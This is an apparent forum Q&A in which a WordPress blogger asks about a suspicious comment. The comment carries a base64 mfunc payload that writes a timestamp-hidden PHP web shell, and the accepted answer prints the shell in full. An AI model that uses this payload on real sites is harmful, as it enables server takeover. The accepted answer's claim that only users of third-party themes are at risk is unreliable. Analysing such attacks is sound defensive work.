# WordPress Comment Hacking Attempt

Tags: wordpress

Recently Akismet asked me to moderate a possible spam comment on my blog.

It was:

```
<!--mfunc eval(base64_decode("ICRmaWxlID0gZGlybmFtZSgkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10pIC4gJy8nIC4gJ3dwLWluY2x1ZGVzL3lkZXNrLnBocCc7ICRzcmMgPSAnPD9waHAgZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgiRFpaSERxd0lFa1R2MHF2L3hRSW92RWE5d0h0WGVEWXR2UGVlMDA5ZElKWDVGQmtSeFpuMGY2cTNHY3MrMllzL2FiSVZPUHBmWG1SVFh2ejVSNGhqWWQwOGVldGNCRnIwcFFqb0FZekZtSXluVVhQMXR3QkRrTElWcDlrdStjN0d4NWx5RUYrQWZHbDQ2aG1CSjJkSmhkQW9ZY2dvQWNnb0VHQ2Q3MDROQmtaaDNKVDdVUnRmOVVMT1k2M29BTnBHZ0xhRXl4YUlqWXJVb2JMbkZ4clkwSlVCbEt1dFU3dndiQmJxTXBoZkhJSUVDb0tZKzZWdHVjOWZhTGhpWW9hYWlSUVovUHNPeXRKTUNyVXlXQ3lJbE9OckRYM1NQU0FZNkRCYStxZ2RiUTBoZGo5dk81bkVDOHhmV2ZyeDg3VXB2Tjc1WmdjcHNpNW9EVGxPVEtoRFdqVjdLZFFsOEREVWV1T3VMcTRReVViTGF4dnJ4aStqQXRJOGNXYWxOQTNtY0RrM2pVV25hV0VoanhhK0U1dmNRS2Z2dVBlOUNPWUxmZGdLS09KQ3kwWVFlV1lKZ2s4QXk0amxHMTh1UFlScmJFOGtNRnhVbEV5R2lMTU51WnhmQ2VyeW05cmV2VE5DbEw2eDByT2pac1c3Qi9PeHZ1Y1FCaU9QS0FnYXpGSXYwZEprbGIyNXdVSzV5NmF5SlZEMDhVNXVOaGhlNlBLV09oVlF3YWxSUGlCMGUyc2EvYWFtYndHRGM2bWJ4SDZtaUZUdVc4Y3NsRE5pZWhLMURGU0orTXU4bGFiSWZlNXFGeTNQOUFqYkpHb3hNQy8yQjRYbEpoQ3dObmdoOSthNnR5bEhubUFmSU1XTjRCYWdYUjJQcjNzSnJGUWQrUGU2ZHZYTE0wVVJBWElPMFR5ckl4MzJFYzFLUjJTaFVBQkdzbDFQS3hvNEh3dGNUYUdQK1IybWFHbnIrT05PaTdOQ0JhY1dYNkp3SkxYSEJCNXdtR05nMkswOHVIdjc0Sk9qUkRRL2RNbmpyZWVncCtLUmNBMmk5bmlreEVFNmxKYXk1WTBiSjdYTTdzSHNTSFg2OExiemVnbFdxeUxQS1NxTHpjUTR3VnFuS1FJRE91UndUZHZUTENPc2dhaENLZDdPOGtkbmVpU1pBcmt1aElETkN0S25Vc1FvU1NqMklxZXQxR0R3M3ExOHZHQ1pOQW1yU1Q5WUY0cVVwcHEwbEZWRGZRenV0em1PZEFwWDlLN09JcXJMQ09temkvUjlkVGpaWEtQSy9JNkN0SWlSVjhFL3B4NDJSNTFTYVJMSFpaUjVLVEdzbG5IcEdlVFJLeEpVR0U3TFBEWnhpeFlOb2lYcTJPc00yWmlkaVZWZ0hob29mclV6WXZRRDFzQ0J0OGdCWVFoOG9KWEt5d0h0VHd4cjJMTHE4dFM4bXhDQ014TmgyRm12WTJKMTBkYjBwV20wT2NPRkg0bjlNN0JHWHNVYXQ3VjR1QWlaVnZjeVpsNFIwaG9EQWNUbWlJZTFPVDl0dnNxcEswZ2dnSFNWSXhTSEhTalpmTzlDUXJycVJqOUgyYVg2NEFseWpENXgwZ0wyaUVBc1J6enJMVS9mYnE3ODM1bGExRlRjWUVZdzhrbUEyRmI4cWFla1dHTjdkMlJjeWExOGNzTW1scStPbFFCcE5DRkt5VGlmc0NHYVNlMzAxQ0M2VDJ6WWN2VVVHaFFUUFBsRm9TZFhxMDk3WE1MbktTVkxjNUJNK0wzQzhueGgvcFhLQ2YrQXhhaC9wbys3ZDRRUDJUNjlHeUxMa1lhUzhNUXhCK1QrazBmQ3J3d2VuVzJoZzdndGpOR2NnOFpIbmVWdmZvTm4vS1FMZVhnQ2RIeEdXa294bjFwcFRGZjFWUEdSRFF0ME5YVUEwb3FQaFJTZkpPT2lPWko0SkF6QWRzNnBHY3RnRWU2NkI1L2lqcUFEZVd2TGpIdWExeW53R1ZkRW8rbW1jYUFPU0pja1VqRUxJR1pPR24xMkNtc0ljVVVZVnVqSmF1MWx5Mk9ic3RseFA0M1dTUC81dUttUVdGRGswcG5WRTZkWWllbTVlb3kyaTZjSDlZUjdLMVpiMVdZTjFuUllpUjYxUXl6NVVXTm1VUXN5dThLV1FzUHdYK2I2VFUvVktBcFhmR0YxNzFYVUdpKzB2TTBPWmxqdkExUXFpKzE1cmY3eUllVFZyR1NYWjN0ZS9vZDJtOFJUNk5Cd2loejQ4RlpPVjN2Z2pMcDRLMkpxMGgxQW9Qd2IyOUVFV0h1V0cwVnExQzY1cTBRb1p2ZlI2Tm8yU1ljQklFcEFXZWppODRyNHRDdFI5cVpzamkyRXY1YVpYQVBRbGJlQ29FMEhjTCt0OUJJVnc2WmUzWlprc29aUWg2QzM0RTlZVVpxQXdBazQ1MW9NREIwcmRsQXRSWG9vcnhvR2RIUERHUTJYNWhFMmE1c2tjVkdNTHc3ZTRybngxTS9XZjRXdnZTZTA0VVFtNGpsMVJxVnNjSkpWdzQ3Q1FtR1RBdmc4cUhublRQSmVFWjgrQTk0eGxkNkZBZnhXUTRKY1dnL01oVWRQc2xPaTNxbnoycEljbU00NldTeEpPUHpoY2pzQVp6Ri9NNGxXOUc4MXlFTVRMZmlaaUNpejYwY3NNdHBYRmV1SCtMeUNVdHdYZVlrVkc5dStSMHI2Wm5GMjYzVm50WC9WVFFETTFndnY2cDFid3VBSUgwaUtoZmQrU0tXRDFZME5lWWlTNnBzNkJRb1FucEc3d1JQZ3c2cVdCS0JPZWRxdWFOVHRrMkYzRWRteWYwVzJ1bkw3UjBKRG9OakZZbmdTeDlybmtNa25vNkZyZEF3ZVpDYTJZZlNIS29BUzFvT0huZ1dUN2xpZ2NvZ2grR0lQb2JKS3FHZ1hmN2NEeTNIRnVDNGNidFZFOC9RSlhpTEZ6RVY4bEh1WVdlYlo2dWlqZ1hUNFE1bk8xMStzWHp3anlsVllMYUFCSnNvbEtKVEZVQlUza0Fxb3hrYmlkS2RsNVVNSkdWb2VtVVNzWkdLa0JCWDYvU1ZoMmVleXNubG9qTHR2NWhoSEtYRmJ6K3dDZzZZMmI4VHdsdFEzTkZmMkNtRWxtand4MXlhZ1lvN2IwVmhIOHZRRERxUUpSWnArU0U5ektBdGNsNll6Vkt5NFVMa2pweU5NMkhXK09HUTVJOGdOUWRKYUI1NVg1ZEtPM3d5WTNkK2VVZXZrVlNYQTl5K2NHWStXaW9CTnpGUHlBVktscnZOemx4dW5IekxQSnhmdHhISkpJd1hZZkpybnpSY1JFNFcxdVNhZDNvdlI3SnVIN2RnN2F6ZUJRWFF0ZnJtMmpXZVZMVW1TazNuUXovR1pjU3cxeE5IQzRoMHRYU29Za21XK3ZMWmxTRXBkbFRaU3RObGNZY2RUR2hpY0J2T2dGY1BEcWNFcTdvOXZuc20vbGlGZEtuQ0VNOERJOFdYaFV0d0lMb0tGUkc4NVF0Wjlodm9ISkRmRG1MYmIyekV3NFpabzdUWlRxckkwZEdZNUJKWVBXdE9jNVZnQlpwbXNnUDhaUlpocjZOc2xSdWhjbk03bW9nS3JkWnFOSWY3K1VMeDZzNVY2Q3oxSlJLWGx1eWZSMWdaZGN0QSswZ041M2RrZndSQ01uNXpBM3NzUzlOY3NiamFLKy9iR2VmdGtlQnhiY0VBTVVrNlk4Njg3WVdQYjh2NGxTWlVjdUx0blJEY2lqT1BIZitSNlBrODFjOG1LWEVQSWdKa3F3b2o1NklpZkNhYktlUS9Ed3R4NThIeklNbitHbS82aXhLa0NGeEdqd1FXR0ZndGhmc08wcnZSaW1xMTRMNEFQNG9OVW00MkUvdWlNQ2J5eXUxdHhPU3hadFh3U05Udk1PMWQxSnV6Q0hzVmRqd3I1MzRlazBERlNTZVFYa21OVk1oTE5NQjFycjc5S0NKSUFBSUlnVVlLWC91OC9mLy8rL2QvL0FRPT0iKSkpOyA/Pic7ICRtdGltZSA9IGZpbGVtdGltZShkaXJuYW1lKCRmaWxlKSk7ICRmaCA9IGZvcGVuKCRmaWxlLCAndycpOyBmd3JpdGUoJGZoLCAkc3JjKTsgZmNsb3NlKCRmaCk7IEB0b3VjaCgkZmlsZSwgJG10aW1lLCAkbXRpbWUpOyBAdG91Y2goZGlybmFtZSgkZmlsZSksICRtdGltZSwgJG10aW1lKTsgCg==")); --><!--/mfunc-->
```

This decodes down to

`$file = dirname($_SERVER['SCRIPT_FILENAME']) . '/' . 'wp-includes/ydesk.php'; 
$src = ''; 
$mtime = filemtime(dirname($file)); 
$fh = fopen($file, 'w'); fwrite($fh, $src); 
fclose($fh); 
@touch($file, $mtime, $mtime); 
@touch(dirname($file), $mtime, $mtime);`

Now I cannot see what the hacker is trying to do here. Could someone please explain what is happening? A `ydesk.php` script does not exist.

Comment: The script-kiddie was probably auto-testing many sites for common vulnerabilities

Answer (score 2, accepted):

Looking at the code, I believe it is just a part of a sequence of steps to run the malicious code within the theme files (ydesk.php) you are using on your site.

So make sure if you are using wordpress themes from third party sources, have a look on the files for any suspicious lines of codes.

If you do not use any third party theme files, you shouldn't worry.

Cheers!

```
<!--mfunc 
    $file = dirname($_SERVER['SCRIPT_FILENAME']) . '/' . 'wp-includes/ydesk.php'; $src = '<?php
    @error_reporting(0);
    @ini_set("display_errors", 0);
    @ini_set("log_errors", 0);
    @ini_set("error_log", 0);
    if (isset($_GET['r'])) {
        print $_GET['r'];
    } elseif (isset($_POST['e'])) {
        eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));
    } elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') {
        $data = file_get_contents('php://input');
        if (strlen($data) > 0)
            print 'STATUS-IMPORT-OK';
        if (strlen($data) > 12) {
            $fp = @fopen('tmpfile', 'a');
            @flock($fp, LOCK_EX);
            @fputs($fp, $_SERVER['REMOTE_ADDR'] . "\t" . base64_encode($data) . "\r\n");
            @flock($fp, LOCK_UN);
            @fclose($fp);
        }
    }
    ?>'; $mtime = filemtime(dirname($file)); $fh = fopen($file, 'w'); fwrite($fh, $src); fclose($fh); @touch($file, $mtime, $mtime); @touch(dirname($file), $mtime, $mtime); 
    exit;
    ; --><!--/mfunc-->
```